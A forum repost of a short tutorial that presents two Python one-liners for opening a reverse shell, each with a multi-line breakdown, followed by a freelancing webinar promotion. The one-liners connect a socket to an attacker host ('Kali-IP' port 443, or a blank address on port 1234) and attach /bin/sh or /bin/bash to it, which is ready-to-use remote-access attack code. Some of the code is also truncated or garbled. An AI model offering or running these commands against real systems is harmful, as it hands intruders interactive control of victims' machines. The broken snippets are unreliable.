Create an account

Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
[Tut] Python One Line Reverse Shell

Python One Line Reverse Shell

<div><p>This article will be fun! You’ll learn about an important concept in security: reverse shells. You’ll also learn how to create reverse shells in Python in a single line of code. So, let’s start with the big question:</p>
<h2>What is a Reverse Shell?</h2>
<p>Here’s the definition of a Reverse Shell:</p>
<p class="has-pale-cyan-blue-background-color has-background">A <strong>reverse shell</strong> is used by hackers to gain access to a target machine. The target machine opens a shell to communicate to the attacking machine. The attacking machine receives the connection (listening on a given port) and is now able to access the target computer. To accomplish a reverse shell, a hacker must execute code on a target machine. Reverse shells are also used by security engineers to test and prevent reverse shell attacks.</p>
<p>You can read more <a href="" target="_blank" rel="noreferrer noopener" title="">here</a>. In this tutorial, you’ll learn how to create a reverse shell in one line Python.</p>
<h2>Method 1</h2>
<p>I found this code in a <a href="" target="_blank" rel="noreferrer noopener" title="">blog </a>thread. You can run it from any computer with Python installed and visible from your current location:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'</pre>
<p>But you should never execute code that’s copy&amp;pasted from an Internet source. What if the code removes all files from your computer?</p>
<p>Let’s have a look at how this code looks like as a Python multi-liner so that you can understand it better:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">import socket,subprocess,os
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
<p>As you see, the code opens a socket (which is an entry point for a connection), <a href="" target="_blank" rel="noreferrer noopener" title="">duplicates file descriptors</a>, and calling a <a href="" target="_blank" rel="noreferrer noopener" title="">Linux shell</a>. Thus, it will only run on Linux-based systems.</p>
<h2>Method 2</h2>
<p>In <a href="" target="_blank" rel="noreferrer noopener" title="">this</a> Github thread, I found another one-liner that opens a reverse shell:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Kali-IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'</pre>
<p>When writing the equivalent multi-liner, the code looks more understandable:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">import pty
import socket,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("Kali-IP",443))
<p>It’s very similar to the above code but uses the <code>pty</code> library to create the shell. </p>
<h2>Where to Go From Here?</h2>
<p>Enough theory, let’s get some practice!</p>
<p>To become successful in coding, you need to get out there and solve real problems for real people. That’s how you can become a six-figure earner easily. And that’s how you polish the skills you really need in practice. After all, what’s the use of learning theory that nobody ever needs?</p>
<p><strong>Practice projects is how you sharpen your saw in coding!</strong></p>
<p>Do you want to become a code master by focusing on practical code projects that actually earn you money and solve problems for people?</p>
<p>Then become a Python freelance developer! It’s the best way of approaching the task of improving your Python skills—even if you are a complete beginner.</p>
<p>Join my free webinar <a rel="noreferrer noopener" href="" target="_blank">“How to Build Your High-Income Skill Python”</a> and watch how I grew my coding business online and how you can, too—from the comfort of your own home.</p>
<p><a href="" target="_blank" rel="noreferrer noopener">Join the free webinar now!</a></p></p>

Possibly Related Threads…
Thread Author Replies Views Last Post
  [Tut] Check Python Version from Command Line and in Script xSicKxBot 0 884 08-24-2023, 01:34 PM
Last Post: xSicKxBot
  [Tut] How to Delete a Line from a File in Python? xSicKxBot 0 609 09-24-2022, 10:31 AM
Last Post: xSicKxBot
  [Tut] A Simple Guide for Using Command Line Arguments in Python xSicKxBot 0 546 08-14-2022, 05:49 PM
Last Post: xSicKxBot
  [Tut] How to Skip a Line in Python using \n? xSicKxBot 0 617 07-05-2022, 03:53 PM
Last Post: xSicKxBot
  [Tut] Line Charts — Learning Line Charts with Streamlit xSicKxBot 0 695 04-29-2022, 10:52 PM
Last Post: xSicKxBot
  [Tut] How to Reverse/Invert a Dictionary Mapping xSicKxBot 0 732 12-11-2020, 02:13 AM
Last Post: xSicKxBot
  [Tut] How to Read a File Line-By-Line and Store Into a List? xSicKxBot 0 756 10-24-2020, 03:12 PM
Last Post: xSicKxBot
  [Tut] Python Reverse List with Slicing — An Illustrated Guide xSicKxBot 0 783 10-02-2020, 01:24 AM
Last Post: xSicKxBot
  [Tut] Python One Line Dictionary xSicKxBot 0 685 09-21-2020, 02:58 PM
Last Post: xSicKxBot
  [Tut] Python One Line Generator xSicKxBot 0 716 09-17-2020, 09:29 PM
Last Post: xSicKxBot

Forum Jump:

Users browsing this thread:
1 Guest(s)

Forum software by © MyBB Theme © iAndrew 2016